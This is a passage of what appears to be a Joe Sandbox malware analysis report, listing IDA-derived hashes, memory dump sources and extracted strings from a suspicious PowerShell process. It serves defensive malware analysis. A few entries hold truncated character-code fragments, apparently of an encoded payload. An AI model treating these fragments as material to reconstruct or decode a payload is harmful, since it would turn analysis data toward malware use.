                                                        • Instruction Fuzzy Hash: 98810374A0520DCFDB54CFA8D485BEEBBF1EB09715F2080AAE409E7690DB745A84CF91
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2171999044.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_2bc0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: xy$
                                                        • API String ID: 0-2399629526
                                                        • Opcode ID: bf7087b96ffa4f6027e1ce768b95cee93f536af3d8c8b818f5d909695f016539
                                                        • Instruction ID: 936f5ee604e3c97bf14422b2e02e5c91dc83807f97a21f0d9a608d1223517ea2
                                                        • Opcode Fuzzy Hash: bf7087b96ffa4f6027e1ce768b95cee93f536af3d8c8b818f5d909695f016539
                                                        • Instruction Fuzzy Hash: D971F474A0120DCFDB54CFA8D485BEEBBF1EB09715F2080AAE409E7690DB745A85CF91
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2171999044.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_2bc0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: xy$
                                                        • API String ID: 0-2399629526
                                                        • Opcode ID: 18ff307147f70f8fa0b026336eb5a52754fdc79d5a71b274f6081126210cd7bc
                                                        • Instruction ID: f50873f86ce21ff56516c802b7f6909f213440142528afe54b8ab9fcf173c698
                                                        • Opcode Fuzzy Hash: 18ff307147f70f8fa0b026336eb5a52754fdc79d5a71b274f6081126210cd7bc
                                                        • Instruction Fuzzy Hash: 7671F474A0120DCFDB54CFA8D485BEEBBF1EB09715F2080AAE409E7690DB745A85CF91
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2171999044.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_2bc0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: xy$
                                                        • API String ID: 0-2399629526
                                                        • Opcode ID: b359b4751d248ed7b365a27874a05cd709ab49fe2489f2a218b5cde650767158
                                                        • Instruction ID: f50873f86ce21ff56516c802b7f6909f213440142528afe54b8ab9fcf173c698
                                                        • Opcode Fuzzy Hash: b359b4751d248ed7b365a27874a05cd709ab49fe2489f2a218b5cde650767158
                                                        • Instruction Fuzzy Hash: 7671F474A0120DCFDB54CFA8D485BEEBBF1EB09715F2080AAE409E7690DB745A85CF91
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2171999044.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_2bc0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: xy$
                                                        • API String ID: 0-2399629526
                                                        • Opcode ID: d5f0373bae6620c0e23761984b45022fd8d0d2cfaba9611b0361d72bc512b475
                                                        • Instruction ID: 03a298f87490df25641d4532a07fa501f1cbf7665596fd73918709a279f55e77
                                                        • Opcode Fuzzy Hash: d5f0373bae6620c0e23761984b45022fd8d0d2cfaba9611b0361d72bc512b475
                                                        • Instruction Fuzzy Hash: 3B71F474A0120DCFDB54CFA8D485BEEBBF1EB09715F2080AAE409E7690DB745A85CF91
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2213590170.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_72e0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: `o$
                                                        • API String ID: 0-2401407490
                                                        • Opcode ID: af744d8b4b748bfc590c3e62ffb3e8d040accc8cc53270edb933c9359b3538a0
                                                        • Instruction ID: b3b7e78469f45b7e1005d26d1461be519af08c61c64b361db7a0ebbcfb263261
                                                        • Opcode Fuzzy Hash: af744d8b4b748bfc590c3e62ffb3e8d040accc8cc53270edb933c9359b3538a0
                                                        • Instruction Fuzzy Hash: BE510AB1E00A588BDB28CF6BCC4479AFBF7AFC9301F18C1A9D408AB255DB7059858F50
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2171999044.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_2bc0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: pqI
                                                        • API String ID: 0-1078129942
                                                        • Opcode ID: fe3a6538353003b3af801bcfb8478f7e27e1fb937c80ffa8727e231f024d3f3a
                                                        • Instruction ID: fdbb8ba3f6b8ac64ed6cd79230cda6a00d7941807d99845522f480255a44bd26
                                                        • Opcode Fuzzy Hash: fe3a6538353003b3af801bcfb8478f7e27e1fb937c80ffa8727e231f024d3f3a
                                                        • Instruction Fuzzy Hash: 51414170E0960EDFDB44CFA9C5402AEB7F1AB48340F64D5A9D42AE7310E7789A42CF90
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2171999044.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_2bc0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: pqI
                                                        • API String ID: 0-1078129942
                                                        • Opcode ID: 98a07795d74682a04ddb1d73967da231da7cfbf467aa046cde8e02adaa8c98cb
                                                        • Instruction ID: 0808434c50fb5640a4415f31564073b550ad6e3d58998a19d52a1b2ef8a09064
                                                        • Opcode Fuzzy Hash: 98a07795d74682a04ddb1d73967da231da7cfbf467aa046cde8e02adaa8c98cb
                                                        • Instruction Fuzzy Hash: F8414471E4550EDFDB44CFA9C5401AEF7F1AB48240F64D9A9D42AE7310E7389A02CF90
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2216878613.0000000008060000.00000040.00000800.00020000.00000000.sdmp, Offset: 08060000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_8060000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: =
                                                        • API String ID: 0-2322244508
                                                        • Opcode ID: 9be620ba4fabb47ebffdb7297e675d4083fa13f6a43bccf8bb986368b481f567
                                                        • Instruction ID: ebb25f98940a320cc9208463dfd111e343907509afe7f94d585ca3fc4c1be8c1
                                                        • Opcode Fuzzy Hash: 9be620ba4fabb47ebffdb7297e675d4083fa13f6a43bccf8bb986368b481f567
                                                        • Instruction Fuzzy Hash: 0F21D4B1E04B588FEB18CF6B8C0419EBBF7AFC5311F04C1AAC459AB265EB7459568F01
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2216878613.0000000008060000.00000040.00000800.00020000.00000000.sdmp, Offset: 08060000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_8060000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: "Z
                                                        • API String ID: 0-607759935
                                                        • Opcode ID: ac74339d05cd4e4b800a3efe843465f30338d5710b4ea5ce1722db9b2e84cf0f
                                                        • Instruction ID: b3245272808502c9bb6c8bdc9708aee292933ce838713b4cdbbb40e2d60a11b6
                                                        • Opcode Fuzzy Hash: ac74339d05cd4e4b800a3efe843465f30338d5710b4ea5ce1722db9b2e84cf0f
                                                        • Instruction Fuzzy Hash: 9EF05E75E0415ACBDB00CE98D8467AEBBF2AB0A315F59A416D105E7342D37CC9A68B48
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2217001342.0000000008070000.00000040.00000800.00020000.00000000.sdmp, Offset: 08070000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_8070000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 32568a494236141c6e4474822822767c7c818d26994a644adba7a99e3e900fee
                                                        • Instruction ID: 98ef8233e18b23a9beb522d52cc2a27670bced4e9fdd318ec32f66921e862bc1
                                                        • Opcode Fuzzy Hash: 32568a494236141c6e4474822822767c7c818d26994a644adba7a99e3e900fee
                                                        • Instruction Fuzzy Hash: 65326670E00655CFDB58CFA9C49466EFBF2BB88301F64862DD55A9B380CB34A902DB95
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2213590170.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_72e0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 46484fc4649fe651fa93aee29a97e905e37fb1a9a23ae7444dd6df933b8ad382
                                                        • Instruction ID: 975da9c9e8c1b2f348aa4c3d8ec3e1ecf516ab5747814fedc2fb59d29b555793
                                                        • Opcode Fuzzy Hash: 46484fc4649fe651fa93aee29a97e905e37fb1a9a23ae7444dd6df933b8ad382
                                                        • Instruction Fuzzy Hash: CAD1C374E102198FDB54DFA9D894BADBBB2FF88300F1081A9D409AB365DB31AD85CF50
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2213590170.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_72e0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d63407b6c17e98c916bcced4bd64edd52a4597e4b8a63a61ad7128c26f7319b4
                                                        • Instruction ID: 3a6446e78307c26a31350d126679cef36554ada43f9f69919e96c57d7a9cade2
                                                        • Opcode Fuzzy Hash: d63407b6c17e98c916bcced4bd64edd52a4597e4b8a63a61ad7128c26f7319b4
                                                        • Instruction Fuzzy Hash: D3A1C274E102198FDB54CF69D884B9DBBB2FF89300F5081AAE409AB364DB31AD85CF51
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2217001342.0000000008070000.00000040.00000800.00020000.00000000.sdmp, Offset: 08070000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_8070000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9e96932eb71db6ca4672bfd9d003dbf3259c9c277a014cc2f25aef22ed87ac26
                                                        • Instruction ID: 8ee6799ed084dd4b360c3d6ece7081b0be33684b4c34854f4956ecff055a9c13
                                                        • Opcode Fuzzy Hash: 9e96932eb71db6ca4672bfd9d003dbf3259c9c277a014cc2f25aef22ed87ac26
                                                        • Instruction Fuzzy Hash: B7813274E1061CCFDB10DFA8D849B9DBBB2FB49305F1081A9D01AA7291DB355D8ACF44
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2217001342.0000000008070000.00000040.00000800.00020000.00000000.sdmp, Offset: 08070000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_8070000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 944f4ecf1dda91514cde8c4aa01325a46ffe1083e5af37c56d2b177fb60a19ff
                                                        • Instruction ID: c45e26d1cec9d284acca18c93231417c42313d7ad5ec01a2cf1b47fe24c65a51
                                                        • Opcode Fuzzy Hash: 944f4ecf1dda91514cde8c4aa01325a46ffe1083e5af37c56d2b177fb60a19ff
                                                        • Instruction Fuzzy Hash: 0E814374E0061CCFDB10DFA8D848BADBBB2FB49305F1080A9D02AA7281DB355D8ACF44
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2217001342.0000000008070000.00000040.00000800.00020000.00000000.sdmp, Offset: 08070000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_8070000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0a3c6b05b1c39dd151559d2316d562f91c91b5121375da72c4196ea3f2848f09
                                                        • Instruction ID: d98854090f53322f37fab2abf685dfb4c082178db30a695986941c6b69b02267
                                                        • Opcode Fuzzy Hash: 0a3c6b05b1c39dd151559d2316d562f91c91b5121375da72c4196ea3f2848f09
                                                        • Instruction Fuzzy Hash: 2C512870E11608CFDB44CFA9D4447EDBBF2EF59312F109029D42AA7240DB356945CF48
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2217001342.0000000008070000.00000040.00000800.00020000.00000000.sdmp, Offset: 08070000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_8070000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3f36e64d72b5b4f39bd6bb7a173baf1389a632b741bd89677f7da3024fd9a0f6
                                                        • Instruction ID: a83b99c52f7b7d4f7ab596fb78e9bde6e25c3282737663cf2974ad198ef80f23
                                                        • Opcode Fuzzy Hash: 3f36e64d72b5b4f39bd6bb7a173baf1389a632b741bd89677f7da3024fd9a0f6
                                                        • Instruction Fuzzy Hash: 7B5116B0E16608CFDB44CFA9D4447EDBBF6EF59312F10902AD42AA7240EB366945CF48
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2171999044.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_2bc0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: dbff145789c8a4a0d2654be16dd2732db0f9d5968ecf2c6db4008eeb02d3722c
                                                        • Instruction ID: 7865e5328acf88de2c0807a01eb3955a0a5b075a9826618941c26b09f75ad8f7
                                                        • Opcode Fuzzy Hash: dbff145789c8a4a0d2654be16dd2732db0f9d5968ecf2c6db4008eeb02d3722c
                                                        • Instruction Fuzzy Hash: 1E5157B1E016598BDB18CFABC94059EFBF3AFC8310F14C17AD958AB214EB3459468F54
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2171999044.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_2bc0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e0804d626c877f16bd1f49dea116066ae725bdf72b387fd9a4f3e3df661ed167
                                                        • Instruction ID: ec838b25d83845dc1b2b90aeeca3617f4bf76769f78e7b22e2986cce68cb8c62
                                                        • Opcode Fuzzy Hash: e0804d626c877f16bd1f49dea116066ae725bdf72b387fd9a4f3e3df661ed167
                                                        • Instruction Fuzzy Hash: 68415CB1E05A58CBEB28DF678C4469AFBF3AFC9301F14C5B9C84CAA255DB3045868F11
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2210157777.0000000006BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_6bf0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 44e237a2025fa770c9090a6a255ef3e793e42c7157343e174c30090d6a994ef9
                                                        • Instruction ID: f3ae573ab84857c44ef1085ec6e44cd4dd456bc064a91cbb75b456ceed51edfe
                                                        • Opcode Fuzzy Hash: 44e237a2025fa770c9090a6a255ef3e793e42c7157343e174c30090d6a994ef9
                                                        • Instruction Fuzzy Hash: 4A3178B1D056588BEB68CF5BC94879EFAF6BF88304F14C1EAC50CA6264DB740A858F01
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2171999044.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_2bc0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b880ac3c0b5a234ea08ac6dabea9ee0a156d1d62bb7455ed906bb912410da4b2
                                                        • Instruction ID: 9dd468c3153d5015ace645041d15c5a476b010b66b86018794f78cf3fcc61bea
                                                        • Opcode Fuzzy Hash: b880ac3c0b5a234ea08ac6dabea9ee0a156d1d62bb7455ed906bb912410da4b2
                                                        • Instruction Fuzzy Hash: A63114B1D01218CBEB19CFAAC9447EEBBF2BBC8304F24D4AAD418A7250DB754985CF54
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2213590170.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_72e0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3e0bb5d09572112ad2e610ba2cb66db44530d1ca63605bae7fdae288e1bcc79b
                                                        • Instruction ID: b842fb72ac1f8df11076eed1627f50fd4939ffb290929bc8aac7d4606a3604a0
                                                        • Opcode Fuzzy Hash: 3e0bb5d09572112ad2e610ba2cb66db44530d1ca63605bae7fdae288e1bcc79b
                                                        • Instruction Fuzzy Hash: 5D2178B1D146588BDB18CF6ACD446DEBBF7AFC9300F54C1AAC809AB214DB715A85CE40
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2171999044.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_2bc0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 52ac5ec4dcb9bc7532232e64e18b1af6e5bea3af4459173e9cfb7a06f530a2c5
                                                        • Instruction ID: ae8d41a551afe6e7a2246b692f1b0e109c516737454602c0ebe129b72a2c8faf
                                                        • Opcode Fuzzy Hash: 52ac5ec4dcb9bc7532232e64e18b1af6e5bea3af4459173e9cfb7a06f530a2c5
                                                        • Instruction Fuzzy Hash: 7B113D71E006188BEB19CF6BC9003EEBBF3AFC9300F14D0BAD508AB214DB344A468B51
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2213590170.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_72e0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e87ae574f99e1977be1daf04444db557c82fd0da95638d49a668069b26b42bcf
                                                        • Instruction ID: 462732f2674ab2cb641e7707890e200da5f589f1f401a4d7dfb4ec770b742d6f
                                                        • Opcode Fuzzy Hash: e87ae574f99e1977be1daf04444db557c82fd0da95638d49a668069b26b42bcf
                                                        • Instruction Fuzzy Hash: 70117AB1E146588BEB18CF6B8D442DEFBF7AFC9300F54C1BAC409AA658DB754946CE40
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2211582504.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7040000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'q$4'q$tPq$tPq$$q$$q$$q$$q$$q$$q$$q
                                                        • API String ID: 0-1500401937
                                                        • Opcode ID: 547d949a1e8bd9211c635ae32422d2db32d10db13ddc720908ff1260cd9ccac2
                                                        • Instruction ID: 1df1d3748ac345d6eef4a90f46d2d84bc45d113e9ac76aa9099af791b9e5623d
                                                        • Opcode Fuzzy Hash: 547d949a1e8bd9211c635ae32422d2db32d10db13ddc720908ff1260cd9ccac2
                                                        • Instruction Fuzzy Hash: A6D124F170030ADFDB648E69C9447AAB7F2EF82211F18CA76E9169B2D0DB35D841C761
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2211582504.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7040000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'q$tPq$$q$$q$$q$$q$$q
                                                        • API String ID: 0-3347370018
                                                        • Opcode ID: 5f57b8d93003fbbc469632b5fef62b47d45647eb80e757fa6ab8c2969a4a6710
                                                        • Instruction ID: 8de99334e16d543067fa4017f0acd37ee26c733c541e49069ae38b7b69ce48fc
                                                        • Opcode Fuzzy Hash: 5f57b8d93003fbbc469632b5fef62b47d45647eb80e757fa6ab8c2969a4a6710
                                                        • Instruction Fuzzy Hash: 4451A0F0A00206DFDB64CE18C644BB9B7F2AB85711F19A676E815AB251C7B1DC80CBA1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2209369154.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_6ba0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'q$4'q$4'q$4'q$Pqq
                                                        • API String ID: 0-3878137055
                                                        • Opcode ID: 242fb15c4bfdac199ad4dc846001e42cc2768a4a52772012c72a9cf905bd609b
                                                        • Instruction ID: ae78b4e3ece791058f91f167cb4ddf0d748513f55cbcbe8c5e03196d3f584128
                                                        • Opcode Fuzzy Hash: 242fb15c4bfdac199ad4dc846001e42cc2768a4a52772012c72a9cf905bd609b
                                                        • Instruction Fuzzy Hash: 10222174A003149FE764DB18C950BAAB7B2EF99304F14C4DAE909AB351DB71ED828F91
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2211582504.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7040000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'q$4'q$$q$$q$$q
                                                        • API String ID: 0-170447905
                                                        • Opcode ID: 12d722630a03a2c89a188aae165164076a4267be19958b07c7d2ed0453e35ad6
                                                        • Instruction ID: 519d1f051fe121475488b22a405e30db3ed142b4739106b5f37223335eba8d23
                                                        • Opcode Fuzzy Hash: 12d722630a03a2c89a188aae165164076a4267be19958b07c7d2ed0453e35ad6
                                                        • Instruction Fuzzy Hash: 599137F6B042079FDB609F6998006AABBF1EFC6220F1C817ED546CB251DB35E942C791
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2211582504.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7040000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'q$$q$$q$$q$$q
                                                        • API String ID: 0-1023332887
                                                        • Opcode ID: 8d20cb9df804119d80aeafeb4348242c27e082ee2e1efc630264caa54b999259
                                                        • Instruction ID: 8e0926e8e37687078a34e9b10652687cd95425a6e68b80cebe79e2d1c3c1ff4f
                                                        • Opcode Fuzzy Hash: 8d20cb9df804119d80aeafeb4348242c27e082ee2e1efc630264caa54b999259
                                                        • Instruction Fuzzy Hash: 1551ACF061420ADFDB648E14CA447AA7BF5BB02351F08CBB6E8259B2E0D334DD81CB61
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2211582504.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7040000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'q$$q$$q$$q$$q
                                                        • API String ID: 0-1023332887
                                                        • Opcode ID: b50d2da20b7684decec3a9a53bdec3901e05c894efe10822d1fbb42b9a458ea3
                                                        • Instruction ID: 97e3159c014625a824df907b580a4bf13a2a8639c3230c0a99e8db8d50a53fe9
                                                        • Opcode Fuzzy Hash: b50d2da20b7684decec3a9a53bdec3901e05c894efe10822d1fbb42b9a458ea3
                                                        • Instruction Fuzzy Hash: 57417EF061020ADFDF688E18CA447AA77F5FB41311F18A3B6E8259B261D774D980CB51
                                                        Strings
                                                        • 69,65,89,71,78,66,120,118,71,106,103,106,69,51,100,50,72,110,86,55,77,119,52,109,67,103,65,110,65,122,89,54,66,68,52,48,73,50,77,4, xrefs: 08066594
                                                        • 4'q, xrefs: 08066584
                                                        • ), xrefs: 0806663B
                                                        • B, xrefs: 08066661
                                                        • $q, xrefs: 08066527
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2216878613.0000000008060000.00000040.00000800.00020000.00000000.sdmp, Offset: 08060000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_8060000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: )$4'q$69,65,89,71,78,66,120,118,71,106,103,106,69,51,100,50,72,110,86,55,77,119,52,109,67,103,65,110,65,122,89,54,66,68,52,48,73,50,77,4$B$$q
                                                        • API String ID: 0-1861811462
                                                        • Opcode ID: 7625c355eeb726741e571af645f33f68aac9812a0fb90a20ff56fc178c1cf3fd
                                                        • Instruction ID: 9489ada87753ab93a14f3cf0e7c10d6daa93664c6af4028363fd601ee7f871ea
                                                        • Opcode Fuzzy Hash: 7625c355eeb726741e571af645f33f68aac9812a0fb90a20ff56fc178c1cf3fd
                                                        • Instruction Fuzzy Hash: D64114719012298FDB64CF69CC817DABBB2BB48300F5485E9E54AE7750CB749ED28F80
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2211582504.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7040000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'q$$q$$q$$q$$q
                                                        • API String ID: 0-1023332887
                                                        • Opcode ID: af2c18261b0841730d2ba74ee75abdfa93b821da69cae22397ad5f8f1ac4d3ac
                                                        • Instruction ID: 6bc2426817f4934ac8eacecf1ac7553eee6fa5003be9f49d797afb426ac10ccf
                                                        • Opcode Fuzzy Hash: af2c18261b0841730d2ba74ee75abdfa93b821da69cae22397ad5f8f1ac4d3ac
                                                        • Instruction Fuzzy Hash: C931F0F2B80207DFDB648F14CA4076AB7F6BB81254F18C27AD4148B252DB74D990CBD1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2211582504.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7040000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'q$$q$$q$$q$$q
                                                        • API String ID: 0-1023332887
                                                        • Opcode ID: 21cedd818e18b90c7dc704ade07f92d829342caebed72a45938d877ccce341fb
                                                        • Instruction ID: 7d314b22f54d98ab16c80be6c25b497f8065387fb8193b879f2920ec313a4f72
                                                        • Opcode Fuzzy Hash: 21cedd818e18b90c7dc704ade07f92d829342caebed72a45938d877ccce341fb
                                                        • Instruction Fuzzy Hash: A231ADF5B8020ADFDFA08E19CB407A9B7F4BF45610F18C276E825AB251D736D940EB51
                                                        Strings
                                                        • 82,99,98,65,120,108,109,79,121,69,86,99,65,111,81,71,105,120,120,89,65,57,122,71,83,52,48,76,121,53,104,74,71,99,107,71,87,69,74,6, xrefs: 0806629A
                                                        • d, xrefs: 0806634D
                                                        • k, xrefs: 08066327
                                                        • XXq, xrefs: 0806623C
                                                        • t-$, xrefs: 08066265
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2216878613.0000000008060000.00000040.00000800.00020000.00000000.sdmp, Offset: 08060000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_8060000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 82,99,98,65,120,108,109,79,121,69,86,99,65,111,81,71,105,120,120,89,65,57,122,71,83,52,48,76,121,53,104,74,71,99,107,71,87,69,74,6$XXq$d$k$t-$
                                                        • API String ID: 0-3902733648
                                                        • Opcode ID: 63cbdc23ce8868484619e67d42df9336d4e181b3277c01f00412a780ffa60cac
                                                        • Instruction ID: 38af212fd5c56a0000cad9c93c4bb90b196a0548486877d9b0bf51cd77619a4e
                                                        • Opcode Fuzzy Hash: 63cbdc23ce8868484619e67d42df9336d4e181b3277c01f00412a780ffa60cac
                                                        • Instruction Fuzzy Hash: 74313971A4016A8FDB20CF59CC41BAEB7F2FB48300F5485E9D10AE7650DB359E819F90
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2209369154.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
